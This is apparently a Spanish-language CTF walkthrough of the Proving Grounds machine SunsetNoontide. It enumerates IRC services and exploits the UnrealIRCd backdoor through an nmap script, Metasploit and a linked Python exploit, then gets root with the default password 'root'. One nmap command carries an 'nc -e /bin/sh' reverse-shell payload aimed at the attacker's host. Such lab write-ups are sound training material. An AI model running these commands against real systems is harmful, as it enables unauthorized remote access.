> For the complete documentation index, see [llms.txt](https://wiki.securiters.com/securiters-wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.securiters.com/securiters-wiki/write-ups/proving-grounds/sunsetnoontide.md).

# SunsetNoontide

Write-up de la máquina SunsetNoontide de Proving Grounds #writeup #walkthrough

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FDbMkDFXcnZhFjdWNQNxZ%2Fimage.png?alt=media&amp;token=713527b6-5feb-4ec3-9fbb-51aed9abcde7" alt=""><figcaption></figcaption></figure>

### Enumeración

#### NMAP&#x20;

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.&#x20;

```
nmap -p- --open -vvv -Pn -n --min-rate 2000 192.168.130.120
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FSZfsuGKUQVjuVXDsCjWr%2Fimage.png?alt=media&amp;token=f4f6464c-31bc-4349-a7d5-b6d1c5fb53bd" alt=""><figcaption></figcaption></figure>

Existen 3 puertos abiertos en el equipo target.&#x20;

* Puerto 6667 -> irc
* Puerto 6697 -> ircs-u
* Puerto 8067

Realizamos un escaneo en profundidad de los servicios abiertos.&#x20;

```
nmap -p6667,6697,8067 -sVC -vv -Pn -n 192.168.130.120 -oN target
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FlkHIe6M5nrB4z6eYyuKN%2Fimage.png?alt=media&amp;token=deef56cd-6b78-4f43-b44f-6b9535aff831" alt=""><figcaption></figcaption></figure>

Tenemos tres servicios IRC. Existe un script NSE **irc-unrealircd-backdoor** en Nmap, vamos a probarlo.

### Explotación

#### Utilizando script de NMAP

El argumento del script irc-unrealircd-backdoor.command se puede utilizar para ejecutar un comando arbitrario en el sistema remoto. También ejecutamos un oyente con nc en nuestra máquina de ataque.&#x20;

Ejecutamos nmap de la siguiente manera para ejecutar comandos arbitrarios en la máquina víctima.&#x20;

```
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.49.130 4444' 192.168.130.120
```

Y por otro lado, un oyente nc.&#x20;

```
nc -nlvp 4444
```

Después de ejecutar NMAP, obtenemos conexión reversa y acceso a la máquina víctima.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F3zo5zgF9sulIZ2yr0Wa4%2Fimage.png?alt=media&amp;token=e28fc7dd-b86a-4a5f-8c69-d695f1a832f6" alt=""><figcaption></figcaption></figure>

El siguiente paso será buscar la flag local.txt. Esta se encuentra en el directorio home/server.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FycCYIki7VAelZHErGbaG%2Fimage.png?alt=media&amp;token=4003230c-43db-483b-a9b4-5ea2dd90080c" alt=""><figcaption></figcaption></figure>

#### Utilizando Metasploit

Anteriormente, durante el escaneo de servicios abiertos, descubrimos que se está ejecutando UnrealIRC en el equipo de la víctima. Vamos a ver que versión. Para ello, vamos a utilizar el script irssi.&#x20;

Instalamos irssi

```
apt install irssi
```

Posteriormente, lo ejecutamos.

```
irssi
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F5i7kiteqDdqRllyA5eL7%2Fimage.png?alt=media&amp;token=b4daa34d-2bd7-40e0-9106-acf6d022e07e" alt=""><figcaption></figcaption></figure>

Debemos introducir la IP del equipo target.

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FtBSJTzMz3b7l5l0Ahzlk%2Fimage.png?alt=media&amp;token=1aabf0c2-5585-489c-8ffb-feacd6a14995" alt=""><figcaption></figcaption></figure>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Fr4wpd1LtqeDbzeUi8cUg%2Fimage.png?alt=media&amp;token=739919b3-f3a1-4a84-aa7b-7d72e0d16334" alt=""><figcaption><p>Versión de UnrealIRC</p></figcaption></figure>

Con esta versión y utilizando searchsploit, vamos a buscar versiones vulnerables para esta versión.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FHxmNiqOipFw4MxBkeRRp%2Fimage.png?alt=media&amp;token=a4e82220-e38e-4ce4-9686-58021123c4a5" alt=""><figcaption><p>Versión de exploit para Metasploit</p></figcaption></figure>

Ejecutamos msfconsole.

* Paso 1. Buscar el exploit

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F2QRwPd2iyN8l7IgSZ1HP%2Fimage.png?alt=media&amp;token=f42773ba-6e43-4fb1-8b4c-1347f418f8f8" alt=""><figcaption></figcaption></figure>

* Seleccionar el exploit

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FkAbPFisdhVY2zWGzw0rV%2Fimage.png?alt=media&amp;token=29c2e568-e53a-4d18-a3f8-0add9cdda124" alt=""><figcaption></figcaption></figure>

* Configuramos el exploit

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Fw6dCB470mQLTPQopp1Me%2Fimage.png?alt=media&amp;token=ccd1002f-6714-41ae-bcf3-6243edf8a426" alt=""><figcaption></figcaption></figure>

* Ejecutar el exploit

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FwYCCIEKAjrIxstC3T5mE%2Fimage.png?alt=media&amp;token=d1961b85-e67c-476c-a91f-a466e6e28b33" alt=""><figcaption><p>Configurar LHOST aunque no se pida configurar en un principio</p></figcaption></figure>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FIdLtOdB7nRvLFxs2SI2H%2Fimage.png?alt=media&amp;token=14d48c4a-45ec-4827-b188-90c2bc1736df" alt=""><figcaption></figcaption></figure>

Y volveriamos a tener conexión con la máquina objetivo. Solo habría que buscar la flag.&#x20;

#### Utilizando un exploit en Python

Para ello, utilizaremos este [exploit](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py).&#x20;

El primer paso será configurar el exploit.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FYWv1r8vWj7FBZajpQDYd%2Fimage.png?alt=media&amp;token=4e4bdd3b-3c2c-4268-8d7a-073c4b27a7d9" alt=""><figcaption><p>Configuramos con los datos de IP local y puerto en escucha</p></figcaption></figure>

Y ejecutamos.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F2aJO4qJk0WOXPugFLCh8%2Fimage.png?alt=media&amp;token=1ecd5233-b8eb-4903-8b3f-534ad4dbd19d" alt=""><figcaption></figcaption></figure>

Al mismo tiempo debemos colocar un oyente en el puerto configurado en el exploit.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FwOUh7XpmXeHLNdszZmni%2Fimage.png?alt=media&amp;token=806bb601-c65e-416b-be5b-1f58e3f13074" alt=""><figcaption></figcaption></figure>

Y volveriamos a tener conexión a la máquina víctima.&#x20;

### Elevación de privilegios

Ingrese el siguiente comando para obtener un shell interactivo

```scala
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Realizamos una comprobación de contraseñas por defecto para usuario root. Ingresamos su root y como password root también (contraseña débil para usuario root)<br>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FSdEIvsoGHAC6YER19fCF%2Fimage.png?alt=media&amp;token=b0108138-8e66-488c-89ea-a1a060d60575" alt=""><figcaption></figcaption></figure>

Ya tenemos privilegios máximos en la máquina. El paso final, será buscar la flag.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FbnwXOieHLQUOVQJHNBaN%2Fimage.png?alt=media&amp;token=6a1b837d-7dc8-45c1-b1b7-b3a1ea5c632c" alt=""><figcaption></figcaption></figure>

Ya tenemos acabado el CTF.&#x20;

{% embed url="<https://youtu.be/-G12P-2ped8&feature=emb_imp_woyt>" %}
